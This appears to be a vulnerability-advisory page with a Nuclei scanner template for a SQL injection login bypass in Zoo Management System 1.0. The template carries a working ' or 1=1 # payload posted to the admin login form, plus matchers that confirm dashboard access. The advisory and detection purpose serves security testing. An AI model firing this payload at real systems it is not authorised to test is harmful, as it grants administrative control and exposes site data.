zms-auth-bypass: Zoo Management System 1.0 - SQL Injection

日期: 2025-08-01 | 影响软件: Zoo Management System 1.0 | POC: 已公开

漏洞描述

Zoo Management System 1.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.

PoC代码[已公开]

id: zms-auth-bypass

info:
  name: Zoo Management System 1.0 - SQL Injection
  author: dwisiswant0
  severity: critical
  description: Zoo Management System 1.0 contains a SQL injection vulnerability. An attacker can possibly obtain sensitive information from a database, modify data, and execute unauthorized administrative operations in the context of the affected site.
  reference:
    - https://www.exploit-db.com/exploits/48880
    - https://packetstormsecurity.com/files/159567/Zoo-Management-System-1.0-SQL-Injection.html
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H
    cvss-score: 10
    cwe-id: CWE-89
  metadata:
    max-request: 1
  tags: edb,auth-bypass,packetstorm,zms,sqli,vuln

http:
  - raw:
      - |
        POST /zms/admin/index.php HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: application/x-www-form-urlencoded
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}/zms/admin/index.php
        Cookie: PHPSESSID={{randstr}}

        username=dw1%27+or+1%3D1+%23&password=dw1%27+or+1%3D1+%23&login=

    host-redirects: true
    max-redirects: 1

    matchers-condition: and
    matchers:
      - type: regex
        regex:
          - "Zoo Management System (\\|\\| Dashboard|@ 2020\\. All right reserved)"
          - "ZMS ADMIN"
        condition: and
        part: body

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100f68feef08b175b4fe365cfad1e4ea03aafb4c14c1f4d2a41a21c315a4a63cb81022100a69d359b8b1bcde7ed0a0b18ce9aaa74d76b29bb78123e62ad88c4673878602a:922c64590222798bb761d5b6d8e72950